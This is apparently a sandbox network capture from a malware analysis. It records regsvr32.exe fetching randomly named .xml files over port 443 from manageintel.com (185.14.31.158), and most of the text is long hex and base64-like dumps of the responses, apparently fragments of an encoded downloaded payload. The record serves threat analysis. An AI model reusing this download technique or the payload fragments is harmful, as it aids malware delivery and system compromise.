Data Ascii: WfbftgN73GXfcg/0D/YP+o/6D//P/g/bah1QUQzV05XcggwEDAYMCowKDA/MDgwLWg7cTgCD343cmgwcDB4MIowiDCfMJgwzWjbcdgC736Xcsgw0DDYMOow6DD/MPgwbWl7cHgDT393cygxMDE4MUoxSDFfMVgxDWkbcBgDL3/Xc4gxkDGYMaoxqDG/MbgxrWm7cLgDj3+3c+gx8DH4MQoyCDIfMhgyTWpbc1gAb3wXcEgyUDJYMmoyaD


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49764 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
2022-01-30 12:30:46 UTC | 829 | OUT | GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1
Host: manageintel.com
Cache-Control: no-cache
2022-01-30 12:30:46 UTC | 829 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:30:49 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
Last-Modified: Wed, 05 Jan 2022 21:29:08 GMT
ETag: "6ee-5d4dc71ad254f"
Accept-Ranges: bytes
Content-Length: 1774
Connection: close
Content-Type: application/xml


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49841 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
2022-01-30 12:33:36 UTC | 831 | OUT | GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1
Host: manageintel.com
Cache-Control: no-cache
2022-01-30 12:33:36 UTC | 831 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:33:39 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
Last-Modified: Wed, 05 Jan 2022 22:10:13 GMT
ETag: "ab044-5d4dd04921d60"
Accept-Ranges: bytes
Content-Length: 700484
Connection: close
Content-Type: application/xml
Data Ascii: QEAiY/0+f/wjY1ImKeMqcAXqLHcVyCfBxBSoTafBxBfjU3khVuQvJdiv5OIv/8PtsiFyQWElwIPAIPsddOnyM3CrrGoEKHMngcQUIdN5OjX4v3/5pCbEIzPqKZbUgAAiEXNikfNiE3DD7ZVod2hTuwDVk5XKACD7BiLxIOl7Pnw/1CLYDzsRnhj2gOzqpri/f+LyOIT5P3wiYXolKeMhy3OI827WovMiaXk+fX/jVWrUui1mqaMyO3S
2022-01-30 12:33:36 UTC1047INData Raw: 0a 71 56 7a 36 42 4c 44 30 45 72 4a 56 7a 34 30 59 2f 76 2f 2f 36 47 59 41 2f 2f 2b 43 68 65 54 39 6b 71 63 6a 79 69 58 71 33 46 2f 63 44 39 69 4c 51 68 54 2f 30 49 46 4e 33 49 50 47 42 49 6c 4e 0d 0a 73 5a 34 32 76 57 79 35 41 70 62 63 51 49 74 4e 32 49 74 51 45 50 58 53 69 45 58 6b 69 30 58 49 56 68 31 58 54 75 79 39 56 30 35 58 79 55 33 59 69 78 47 4c 54 64 4b 4c 51 67 7a 77 30 49 68 46 0d 0a 67 4e 58 2b 61 5a 62 4e 71 4d 63 61 2f 6f 74 56 76 49 6d 56 58 50 58 2f 2f 34 74 4b 76 49 4e 34 65 55 67 42 54 61 2b 33 4e 37 47 6f 76 51 45 41 41 41 44 72 43 73 32 46 59 50 2f 77 2f 77 41 41 0d 0a 62 56 6a 35 7a 41 6a 4e 71 4c 48 66 44 2b 34 50 74 6c 58 75 68 64 68 30 46 34 74 4b 76 49 73 49 35 4e 57 48 76 35 66 4e 33 4e 75 6a 76 50 2f 2f 69 5a 56 63 2f 2f 58 2f
Data Ascii: qVz6BLD0ErJVz40Y/v//6GYA//+CheT9kqcjyiXq3F/cD9iLQhT/0IFN3IPGBIlNsZ42vWy5ApbcQItN2ItQEPXSiEXki0XIVh1XTuy9V05XyU3YixGLTdKLQgzw0IhFgNX+aZbNqMca/otVvImVXPX//4tKvIN4eUgBTa+3N7GovQEAAADrCs2FYP/w/wAAbVj5zAjNqLHfD+4PtlXuhdh0F4tKvIsI5NWHv5fN3NujvP//iZVc//X/
2022-01-30 12:33:36 UTC1063INData Raw: 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 50 79 43 58 61 33 41 75 2f 79 30 58 73 69 30 33 73 69 55 66 77 69 31 58 6a 67 38 49 45 0d 0a 35 41 32 76 79 69 33 65 31 49 35 66 79 30 58 59 69 30 33 77 67 7a 4d 41 44 34 53 52 41 41 41 41 35 67 32 76 79 6d 71 37 45 6f 72 63 44 2f 43 4c 45 59 6c 56 77 49 46 46 36 49 6c 4b 31 49 74 4e 0d 0a 75 64 45 2b 2f 65 4e 6e 76 38 63 43 6b 6f 74 46 30 49 6c 46 75 49 46 4e 32 49 74 61 38 49 73 42 52 6c 71 79 75 57 71 37 45 6f 4c 63 44 2f 43 4c 45 59 6c 56 79 49 46 46 7a 4d 48 76 41 6f 6c 46 0d 0a 69 64 4d 2b 69 65 46 2f 74 34 6b 53 76 67 41 41 41 41 43 42 66 65 34 41 45 41 41 50 63 67 32 4e 4f 4c 77 68 7a 43 33 53 42 36 59 62 2b 50 2f 2f 69 30 33 6b 55 59 46 56 34 46 4c 6e 68 57 34 42 0d 0a 62 64 75 33 53 61
Data Ascii: hAAAAAFpkiSUPAAAA7rRPyCXa3Au/y0Xsi03siUfwi1Xjg8IE5A2vyi3e1I5fy0XYi03wgzMAD4SRAAAA5g2vymq7EorcD/CLEYlVwIFF6IlK1ItNudE+/eNnv8cCkotF0IlFuIFN2Ita8IsBRlqyuWq7EoLcD/CLEYlVyIFFzMHvAolFidM+ieF/t4kSvgAAAACBfe4AEAAPcg2NOLwhzC3SB6Yb+P//i03kUYFV4FLnhW4Bbdu3Sa
2022-01-30 12:33:36 UTC1079INData Raw: 6f 6a 67 75 30 45 41 49 79 50 55 54 63 46 2f 78 53 36 41 66 6e 2f 2f 57 4c 52 66 7a 4a 51 41 6f 41 0d 0a 35 72 30 75 67 71 54 2b 6d 34 4b 62 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c 37 46 47 47 54 66 79 4c 4b 4b 52 38 39 79 41 6a 30 6f 63 6a 58 47 69 56 79 7a 63 68 61 4a 39 44 59 2f 39 6c 41 47 6f 52 0d 0a 35 67 32 50 45 34 44 31 73 62 47 6f 79 55 58 38 78 6b 41 52 41 49 48 6c 58 63 50 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 44 37 5a 48 45 59 58 4a 0d 0a 47 55 59 62 68 4d 30 4e 64 69 5a 43 6c 5a 73 46 61 67 42 71 45 59 46 56 2f 46 4c 6e 68 2b 62 2f 6b 74 4d 32 76 61 35 79 52 6b 37 63 70 31 33 44 7a 4d 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 45 4f 46 2f 71 38 55 53 76 67 2b 32 53 42 4b 46 79 58
Data Ascii: ojgu0EAIyPUTcF/xS6Afn//WLRfzJQAoA5r0ugqT+m4KbjszMzMzMzF+L7FGGTfyLKKR89yAj0ocjXGiVyzchaJ9DY/9lAGoR5g2PE4D1sbGoyUX8xkARAIHlXcPDzMzMoZS/jaT+m4ICyexRiU38i0/8D7ZHEYXJGUYbhM0NdiZClZsFagBqEYFV/FLnh+b/ktM2va5yRk7cp13DzMzMzMbMzMzDzMzMONOfEOF/q8USvg+2SBKFyX
2022-01-30 12:33:36 UTC1095INData Raw: 6c 41 41 41 41 41 4c 4b 34 4a 41 41 50 36 4c 34 57 0d 0a 62 46 69 30 42 4a 51 79 56 30 35 58 7a 30 55 49 69 55 58 67 69 30 66 67 69 55 33 58 69 31 58 67 37 69 4a 6e 55 52 6f 37 6b 41 75 4c 51 77 41 41 41 4f 73 48 78 30 2f 63 41 41 41 50 41 49 70 46 0d 0a 73 64 41 32 73 6d 65 45 47 72 33 53 69 33 51 4f 69 31 58 67 69 77 69 4a 52 62 69 45 54 62 69 4a 49 49 44 34 46 4c 43 37 41 76 72 63 42 37 53 4a 52 62 42 71 52 47 41 41 6a 59 31 44 2f 2f 2f 2f 0d 0a 50 4c 43 5a 35 70 66 4e 50 56 34 39 51 6f 31 56 6b 46 4c 6f 33 61 33 2f 2f 7a 50 50 69 45 58 79 34 42 57 42 71 53 69 58 71 62 48 65 42 39 53 4c 54 64 54 6f 78 64 4c 2f 2f 32 67 50 49 41 41 41 0d 0a 34 4e 56 50 6d 70 66 4e 42 73 55 43 6c 6c 4a 71 41 47 67 6f 63 41 77 51 36 48 6e 78 2f 66 2f 2f 76 57 75 7a 79 53
Data Ascii: lAAAAALK4JAAP6L4WbFi0BJQyV05Xz0UIiUXgi0fgiU3Xi1Xg7iJnURo7kAuLQwAAAOsHx0/cAAAPAIpFsdA2smeEGr3Si3QOi1XgiwiJRbiETbiJIID4FLC7AvrcB7SJRbBqRGAAjY1D////PLCZ5pfNPV49Qo1VkFLo3a3//zPPiEXy4BWBqSiXqbHeB9SLTdToxdL//2gPIAAA4NVPmpfNBsUCllJqAGgocAwQ6Hnx/f//vWuzyS
2022-01-30 12:33:36 UTC1111INData Raw: 4e 0d 0a 6d 54 7a 36 54 47 67 79 56 30 37 63 70 31 33 43 43 41 42 6d 6b 46 45 75 41 78 43 35 4c 67 4d 51 65 6e 64 77 55 52 41 64 56 46 36 4f 62 51 4d 51 4f 6a 41 44 45 4a 45 77 41 78 44 7a 4d 41 4d 51 0d 0a 62 56 6c 78 52 6d 73 32 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 32 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 0d 0a 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 73 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 6e 77 65 77 49 33 55 55 49 33 52 59 6b 36 4e 6b 6e 41 51 43 44 71 56 44 72 78 4b 68 4e 58 6f 6b 53 74 67 45 41 41 41 44 72 42 38
Data Ascii: NmTz6TGgyV07cp13CCABmkFEuAxC5LgMQendwURAdVF6ObQMQOjADEJEwAxDzMAMQbVlxRms2UElQRQcHBwcHBw0HBwcIBwcHal92Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBszMzMbMzMzDzMzMONOfwoQq3gOnwewI3UUI3RYk6NknAQCDqVDrxKhNXokStgEAAADrB8
2022-01-30 12:33:36 UTC1127INData Raw: 6f 6c 4e 31 49 74 56 31 46 69 4e 6a 59 54 30 2f 2f 2f 6f 61 65 43 50 76 75 57 33 30 37 57 6f 76 59 6d 46 6c 50 76 2f 2f 38 79 46 6d 50 76 77 2f 77 48 47 0d 0a 4b 4b 52 35 7a 4f 56 65 72 4c 47 6f 79 34 30 30 2f 2f 2f 2f 6a 5a 2b 63 2b 2f 2f 77 69 5a 55 34 6b 71 65 4d 79 75 30 47 71 4c 47 6f 79 59 30 34 2f 2f 2f 2f 69 59 38 73 2f 2f 2f 77 69 59 30 77 0d 0a 6b 71 65 4d 4b 32 70 59 56 73 58 43 63 76 2f 2f 2f 31 4b 4c 68 53 62 2f 2f 2f 39 66 6a 59 32 77 6c 4b 65 4d 71 59 6a 75 71 72 48 61 7a 37 44 35 2f 2f 2b 4a 6a 63 72 35 2f 2f 2f 4a 68 63 54 35 0d 0a 6b 71 64 79 68 79 33 4f 58 49 6b 53 6b 74 69 65 42 78 43 4c 56 64 70 53 6a 59 32 76 2b 2f 2f 2f 68 63 76 46 76 5a 65 2f 30 75 36 73 76 66 2b 4a 68 62 44 37 2f 2f 58 47 68 62 54 30 2f 2f 38 42 0d 0a 71 78 32 50
Data Ascii: olN1ItV1FiNjYT0///oaeCPvuW307WovYmFlPv//8yFmPvw/wHGKKR5zOVerLGoy400////jZ+c+//wiZU4kqeMyu0GqLGoyY04////iY8s///wiY0wkqeMK2pYVsXCcv///1KLhSb///9fjY2wlKeMqYjuqrHaz7D5//+Jjcr5///JhcT5kqdyhy3OXIkSktieBxCLVdpSjY2v+///hcvFvZe/0u6svf+JhbD7//XGhbT0//8Bqx2P
2022-01-30 12:33:36 UTC1143INData Raw: 76 2f 2f 35 74 31 6e 76 35 66 4e 33 4d 4e 50 76 50 2f 2f 69 59 55 4d 2f 76 58 2f 69 59 30 66 2f 76 2f 2f 0d 0a 42 31 6f 5a 51 4f 4f 6e 52 37 43 6f 76 56 4b 4c 68 51 7a 2b 2f 2f 56 51 6a 59 30 62 2b 76 2f 2f 68 63 76 64 76 4a 65 2f 32 6c 71 74 76 66 2b 4a 6a 53 54 36 2f 2f 58 47 68 53 6a 31 2f 2f 38 42 0d 0a 71 78 32 50 55 71 2b 33 57 37 47 6f 76 64 69 65 42 78 43 4c 6c 51 62 2f 2f 2f 39 64 6a 59 30 6f 6c 71 65 4d 71 53 69 36 71 37 48 61 78 79 6a 37 2f 2f 2b 4a 68 54 4c 37 2f 2f 2f 4a 68 54 7a 37 0d 0a 6b 71 64 79 68 79 33 4f 51 38 32 37 57 6f 76 4d 69 61 56 77 2f 50 58 2f 69 55 32 58 6a 56 56 4d 35 4d 31 37 76 70 66 4e 33 4d 74 66 76 66 2f 2f 69 59 56 73 2f 50 58 2f 6a 55 33 54 55 51 2b 32 0d 0a 4f 49 4d 68 79 69 57 71 76 78 76 47 76 76 2f 47 52 66 77 56
Data Ascii: v//5t1nv5fN3MNPvP//iYUM/vX/iY0f/v//B1oZQOOnR7CovVKLhQz+//VQjY0b+v//hcvdvJe/2lqtvf+JjST6//XGhSj1//8Bqx2PUq+3W7GovdieBxCLlQb///9djY0olqeMqSi6q7Haxyj7//+JhTL7///JhTz7kqdyhy3OQ827WovMiaVw/PX/iU2XjVVM5M17vpfN3Mtfvf//iYVs/PX/jU3TUQ+2OIMhyiWqvxvGvv/GRfwV
2022-01-30 12:33:36 UTC1159INData Raw: 55 32 38 55 59 32 56 56 50 62 2f 2f 31 4a 6c 41 47 67 4d 0d 0a 48 56 35 6a 71 53 41 4f 71 72 47 6f 6b 6d 6f 42 6a 59 30 34 2f 76 58 2f 36 4a 6d 66 2f 66 2f 47 4b 4b 52 33 63 71 69 36 45 71 54 61 44 2b 72 6f 32 44 4c 2b 2f 34 4e 46 75 49 74 43 75 4f 68 74 0d 0a 66 61 65 4d 79 69 57 4b 42 73 58 43 4f 76 2f 2f 2f 31 4b 4e 52 53 35 51 69 34 31 37 2f 2f 2f 2f 50 4e 58 6d 43 5a 62 4e 71 42 79 2f 69 57 62 38 2f 31 44 6f 52 57 7a 38 2f 31 44 6e 76 32 62 38 0d 0a 6b 67 69 62 2b 41 37 4f 71 48 32 58 79 6b 58 70 6a 55 33 70 36 42 59 6c 2f 76 2b 47 52 62 53 4c 49 4f 79 62 59 47 66 4e 71 4d 55 61 39 6c 47 4e 6c 56 54 38 2f 2f 56 53 6a 59 56 48 2f 76 2f 2f 0d 0a 50 62 44 35 4a 35 54 4e 42 36 62 54 4a 50 7a 2f 4d 38 6d 49 54 65 4b 4e 54 65 6a 6e 6c 2f 44 39 6b 74 45 32
Data Ascii: U28UY2VVPb//1JlAGgMHV5jqSAOqrGokmoBjY04/vX/6Jmf/f/GKKR3cqi6EqTaD+ro2DL+/4NFuItCuOhtfaeMyiWKBsXCOv///1KNRS5Qi417////PNXmCZbNqBy/iWb8/1DoRWz8/1Dnv2b8kgib+A7OqH2XykXpjU3p6BYl/v+GRbSLIOybYGfNqMUa9lGNlVT8//VSjYVH/v//PbD5J5TNB6bTJPz/M8mITeKNTejnl/D9ktE2
2022-01-30 12:33:36 UTC1175INData Raw: 67 59 51 0d 0a 68 53 32 62 51 57 69 78 6b 30 4c 63 46 2f 79 4c 41 6f 6f 49 69 45 66 34 67 48 33 33 41 41 2b 45 37 56 68 7a 51 65 68 50 72 30 38 6a 53 6f 42 39 2b 41 4a 30 50 4f 46 2b 69 31 58 7a 69 77 4b 4c 0d 0a 4a 56 44 36 44 4a 69 35 41 72 37 65 46 2b 79 4c 52 65 79 4a 52 65 4b 4c 54 65 69 45 45 59 73 43 35 42 32 58 79 69 58 57 33 67 4f 33 7a 31 58 67 69 56 58 63 69 30 2f 63 69 77 69 45 56 66 79 4a 0d 0a 4a 31 79 59 44 2b 4e 33 71 38 56 66 79 56 45 49 69 56 58 59 69 30 2f 59 69 55 58 37 69 30 33 30 35 42 57 37 79 6a 33 47 33 45 7a 65 42 39 53 4c 54 64 53 4a 54 64 71 4e 56 64 43 47 56 63 79 4c 0d 0a 4b 4a 54 34 53 65 4e 6e 71 38 63 64 53 75 73 57 69 30 58 38 78 30 6f 4d 41 51 41 50 41 4f 73 4b 35 68 57 50 68 69 6b 2b 56 30 35 58 51 6f 76 6c 58 63 50 4d
Data Ascii: gYQhS2bQWixk0LcF/yLAooIiEf4gH33AA+E7VhzQehPr08jSoB9+AJ0POF+i1XziwKLJVD6DJi5Ar7eF+yLReyJReKLTeiEEYsC5B2XyiXW3gO3z1XgiVXci0/ciwiEVfyJJ1yYD+N3q8VfyVEIiVXYi0/YiUX7i0305BW7yj3G3EzeB9SLTdSJTdqNVdCGVcyLKJT4SeNnq8cdSusWi0X8x0oMAQAPAOsK5hWPhik+V05XQovlXcPM
2022-01-30 12:33:36 UTC1191INData Raw: 58 30 77 59 51 38 67 39 59 77 63 6e 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 4c 55 66 35 79 74 42 78 41 47 66 42 76 46 2b 57 37 4f 78 4f 4e 35 0d 0a 54 35 70 79 49 35 6e 4d 58 36 69 58 67 51 39 58 79 66 49 50 4b 73 41 50 56 38 44 39 44 79 72 42 72 4c 46 73 73 32 64 72 57 6b 37 47 52 42 44 79 44 31 67 45 7a 66 4b 51 42 68 44 39 44 31 6a 42 0d 0a 72 67 33 34 72 5a 35 33 58 30 38 42 79 66 48 48 42 67 79 52 42 68 70 30 43 6d 6f 44 56 75 68 72 6c 36 65 4d 47 44 47 35 6b 52 41 4b 67 41 51 41 56 59 76 73 69 30 38 4d 67 2b 67 50 64 44 4f 44 0d 0a 68 56 6b 48 59 65 76 61 56 6a 70 47 77 65 67 42 64 41 55 7a 77 45 72 72 4d 4f 67 6e 2b 2f 2f 2f 68 6c 32 62 51 35 50 4e 71 45 48 68 67 75 73 66 2f 33 55 51 2f 33 38 49 36 42 67 50 41 41 42 5a 0d 0a 68 6b
Data Ascii: X0wYQ8g9YwcnMzMzDzMzMoZS/jaT+m4LUf5ytBxAGfBvF+W7OxON5T5pyI5nMX6iXgQ9XyfIPKsAPV8D9DyrBrLFss2drWk7GRBDyD1gEzfKQBhD9D1jBrg34rZ53X08ByfHHBgyRBhp0CmoDVuhrl6eMGDG5kRAKgAQAVYvsi08Mg+gPdDODhVkHYevaVjpGwegBdAUzwErrMOgn+///hl2bQ5PNqEHhgusf/3UQ/38I6BgPAABZhk
2022-01-30 12:33:36 UTC1207INData Raw: 4b 77 48 55 43 35 70 2b 4d 4e 47 42 69 76 2b 4f 32 76 66 2b 4c 64 53 54 2f 4e 76 56 31 47 50 39 36 46 46 66 6f 0d 0a 44 31 46 7a 51 65 4e 30 55 77 34 48 76 58 55 59 56 2b 69 7a 44 77 6f 41 61 41 41 4f 41 41 44 2f 47 48 43 4d 4d 6d 54 4e 49 6c 61 6f 4e 78 42 58 2f 33 55 49 36 4e 38 47 41 41 43 4d 78 44 69 46 0d 0a 72 53 78 30 46 6a 6a 61 59 61 2b 6f 76 56 39 65 57 31 33 44 56 59 48 73 67 2b 78 72 55 31 5a 58 35 69 56 72 63 71 68 6c 71 44 74 44 79 30 58 77 2f 33 55 4d 69 45 2f 6f 36 45 6b 41 41 41 43 4c 0d 0a 70 64 75 33 54 65 46 2f 72 38 32 75 76 51 2b 4d 63 77 4d 41 41 44 46 50 42 41 2b 43 61 67 4d 41 62 64 4d 75 53 65 6b 4a 4e 44 30 36 6f 67 2b 46 39 77 41 41 41 49 6c 37 45 41 4d 41 68 65 30 41 0d 0a 62 56 6a 79 4f 6e 77 53 55 74 31 4f 4e 68 61 42 65 78
Data Ascii: KwHUC5p+MNGBiv+O2vf+LdST/NvV1GP96FFfoD1FzQeN0Uw4HvXUYV+izDwoAaAAOAAD/GHCMMmTNIlaoNxBX/3UI6N8GAACMxDiFrSx0FjjaYa+ovV9eW13DVYHsg+xrU1ZX5iVrcqhlqDtDy0Xw/3UMiE/o6EkAAACLpdu3TeF/r82uvQ+McwMAADFPBA+CagMAbdMuSekJND06og+F9wAAAIl7EAMAhe0AbVjyOnwSUt1ONhaBex
2022-01-30 12:33:36 UTC1223INData Raw: 6f 76 51 2b 46 61 66 7a 2f 2f 34 47 4e 31 50 62 77 2f 34 58 4a 0d 0a 47 52 33 34 66 65 55 32 38 45 68 48 78 2f 38 50 68 59 67 41 41 41 6f 7a 77 46 43 47 68 64 54 30 6b 71 66 36 78 45 54 4d 71 4c 48 61 78 39 6a 30 2f 2f 39 51 6a 59 38 77 2f 76 2f 77 61 4d 77 42 0d 0a 62 56 67 6a 71 58 63 71 56 30 37 55 68 68 43 4c 6e 53 7a 2b 2f 2f 57 4a 6e 65 6a 35 2f 2f 2b 46 74 6c 66 32 72 57 67 79 56 33 32 65 71 77 55 42 41 41 41 7a 77 46 71 4a 68 64 54 37 2f 2f 2b 4a 0d 0a 36 48 53 4e 76 70 65 2f 30 70 61 6a 76 66 39 51 6a 59 55 77 2f 76 58 2f 61 4d 77 4f 41 41 42 51 68 59 4a 6b 51 57 69 78 6b 31 35 6c 67 75 6c 46 2f 2f 2f 2f 67 36 2f 55 39 50 2f 77 41 49 4f 6c 0d 0a 51 61 61 4d 76 6d 68 59 56 36 55 7a 77 66 38 42 64 4b 6d 46 32 33 36 74 4d 38 6b 38 39 6f 76 48 6d 76
Data Ascii: ovQ+Fafz//4GN1Pbw/4XJGR34feU28EhHx/8PhYgAAAozwFCGhdT0kqf6xETMqLHax9j0//9QjY8w/v/waMwBbVgjqXcqV07UhhCLnSz+//WJnej5//+Ftlf2rWgyV32eqwUBAAAzwFqJhdT7//+J6HSNvpe/0pajvf9QjYUw/vX/aMwOAABQhYJkQWixk15lgulF////g6/U9P/wAIOlQaaMvmhYV6Uzwf8BdKmF236tM8k89ovHmv
2022-01-30 12:33:36 UTC1239INData Raw: 77 67 2f 6a 2f 0d 0a 47 56 34 31 65 68 30 69 4b 35 49 49 47 56 35 64 77 34 76 2f 56 59 48 73 56 6a 50 35 4f 58 55 51 45 30 51 6b 79 68 55 6d 33 41 4e 66 46 66 39 31 44 4f 68 38 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 46 74 43 52 4f 55 79 66 39 56 69 2b 78 57 4d 2f 77 35 64 52 42 78 49 56 4e 6d 59 75 59 75 54 54 2b 35 4b 6c 72 63 44 77 68 58 55 2b 69 4f 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 4e 74 44 42 41 4b 67 59 76 2f 56 59 76 73 55 54 6e 41 69 55 33 7a 69 51 47 4a 4c 46 7a 36 41 47 43 37 46 6b 4c 65 41 78 43 4a 51 52 53 4a 51 52 4b 4a 51 52 79 47 51 53 43 4a 0d 0a 4c 48 7a 36 41 45 42 55 33 67 39 6e 79 30 45 34 69 45 45 38 69 59 74 41 42 41 41 50 69 59 46 45 61 56 68 7a 79 71 6e 37 6c 4d 57 6f 46 34 76 73 55 54
Data Ascii: wg/j/GV41eh0iK5IIGV5dw4v/VYHsVjP5OXUQE0QkyhUm3ANfFf91DOh8IAoAgz/wdAZGVi1jPYFtCROUyf9Vi+xWM/w5dRBxIVNmYuYuTT+5KlrcDwhXU+iOIAoAgz/wdAZGVi1jPYNtDBAKgYv/VYvsUTnAiU3ziQGJLFz6AGC7FkLeAxCJQRSJQRKJQRyGQSCJLHz6AEBU3g9ny0E4iEE8iYtABAAPiYFEaVhzyqn7lMWoF4vsUT
2022-01-30 12:33:36 UTC1255INData Raw: 44 74 62 76 58 55 49 36 41 54 2b 2f 2f 58 4d 69 2f 39 61 69 2b 79 4e 4b 45 67 6a 4b 32 6a 4e 49 6b 4b 6f 4e 77 6a 6f 54 76 2f 2f 2f 34 6e 45 45 46 33 4d 69 2f 39 56 0d 0a 35 72 54 2b 42 48 78 69 50 55 36 6f 4e 78 44 2f 64 51 7a 2f 64 51 4c 6f 56 66 2f 77 2f 34 50 45 65 51 57 77 79 70 64 6b 41 50 48 66 38 77 63 51 4d 2f 5a 71 41 47 4b 67 44 77 41 50 56 2b 6a 4b 0d 0a 43 56 68 7a 78 4b 68 47 54 37 46 53 6d 72 49 48 45 49 50 47 47 49 6e 48 47 49 48 78 55 41 45 41 62 53 71 6f 38 57 6e 5a 58 53 52 58 71 68 30 41 41 41 42 5a 4d 73 70 66 58 73 4f 45 2f 31 57 4c 0d 0a 67 54 4d 32 53 58 41 33 33 2f 39 51 55 6c 44 2f 46 52 42 67 42 68 70 64 77 34 76 77 56 6f 73 31 74 65 70 30 55 65 33 45 49 32 34 38 68 42 68 58 6a 62 68 77 73 51 30 51 56 2f 38 61 48 47 41 47 0d 0a
Data Ascii: DtbvXUI6AT+//XMi/9ai+yNKEgjK2jNIkKoNwjoTv///4nEEF3Mi/9V5rT+BHxiPU6oNxD/dQz/dQLoVf/w/4PEeQWwypdkAPHf8wcQM/ZqAGKgDwAPV+jKCVhzxKhGT7FSmrIHEIPGGInHGIHxUAEAbSqo8WnZXSRXqh0AAABZMspfXsOE/1WLgTM2SXA33/9QUlD/FRBgBhpdw4vwVos1tep0Ue3EI248hBhXjbhwsQ0QV/8aHGAG
2022-01-30 12:33:36 UTC1271INData Raw: 51 34 41 74 38 65 70 6e 53 64 7a 51 52 31 49 33 41 4e 62 79 56 55 49 39 38 48 2f 2f 77 55 41 64 51 53 4b 30 6e 52 6f 0d 0a 73 34 48 4e 51 70 54 4e 71 4a 47 33 45 54 50 62 39 73 52 42 64 51 74 44 39 6b 55 42 45 48 55 66 62 70 48 36 44 47 53 33 68 54 64 52 77 63 6b 42 69 55 30 4d 41 39 68 4f 39 6b 55 42 45 48 54 6f 0d 0a 43 39 4d 4f 54 2b 46 6e 58 2f 61 34 76 51 41 41 5a 69 50 34 68 64 45 50 74 38 64 70 69 58 30 4f 4e 69 78 36 54 47 69 79 56 30 34 78 79 30 55 4f 33 55 55 49 61 67 70 52 55 64 30 54 4a 4f 67 78 0d 0a 62 56 68 7a 77 71 77 2b 76 47 30 39 51 6c 48 64 32 46 48 64 48 43 37 6f 48 67 41 50 41 41 2b 33 6d 74 75 33 54 61 6e 63 55 38 2b 78 76 51 63 41 41 49 48 75 2f 67 6b 41 41 46 2b 45 52 52 43 4a 0d 0a 58 51 59 75 67 75 50 4e 41 73 57 37 45 31 47 4c
Data Ascii: Q4At8epnSdzQR1I3ANbyVUI98H//wUAdQSK0nRos4HNQpTNqJG3ETPb9sRBdQtD9kUBEHUfbpH6DGS3hTdRwckBiU0MA9hO9kUBEHToC9MOT+FnX/a4vQAAZiP4hdEPt8dpiX0ONix6TGiyV04xy0UO3UUIagpRUd0TJOgxbVhzwqw+vG09QlHd2FHdHC7oHgAPAA+3mtu3TancU8+xvQcAAIHu/gkAAF+ERRCJXQYuguPNAsW7E1GL
2022-01-30 12:33:36 UTC1287INData Raw: 44 70 62 77 58 34 59 2f 6e 51 47 67 45 51 6f 67 4f 74 32 69 38 66 47 0d 0a 4b 33 44 79 77 6f 41 79 49 31 37 55 71 67 46 30 42 34 50 6f 41 57 44 30 36 77 5a 6c 39 65 73 43 42 36 34 72 45 5a 63 6e 39 79 35 52 55 6f 76 59 67 2f 76 2f 64 41 65 46 32 33 51 47 55 2f 38 56 0d 0a 79 54 68 31 55 59 4d 77 5a 49 37 53 67 6e 51 63 44 37 62 41 69 56 51 59 67 2f 67 4e 64 51 61 41 49 33 41 7a 71 6b 47 78 72 30 30 69 5a 6f 42 4f 4b 41 6a 72 48 6f 70 4f 4b 45 44 49 52 68 6a 2b 0d 0a 6b 71 65 4d 34 46 79 47 55 46 37 53 67 6e 51 4b 69 77 53 34 78 30 6f 51 2f 76 2f 77 2f 30 65 44 6b 6c 74 38 78 44 2f 4e 71 4c 45 49 48 46 76 44 61 67 78 6f 2b 48 51 48 45 4f 67 50 37 66 37 2f 0d 0a 42 31 2b 62 68 4d 72 4e 71 42 64 6b 6d 59 68 64 35 34 6c 64 2f 46 6e 6f 4f 4a 51 50 41 46 6d 46
Data Ascii: DpbwX4Y/nQGgEQogOt2i8fGK3DywoAyI17UqgF0B4PoAWD06wZl9esCB64rEZcn9y5RUovYg/v/dAeF23QGU/8VyTh1UYMwZI7SgnQcD7bAiVQYg/gNdQaAI3AzqkGxr00iZoBOKAjrHopOKEDIRhj+kqeM4FyGUF7SgnQKiwS4x0oQ/v/w/0eDklt8xD/NqLEIHFvDagxo+HQHEOgP7f7/B1+bhMrNqBdkmYhd54ld/FnoOJQPAFmF
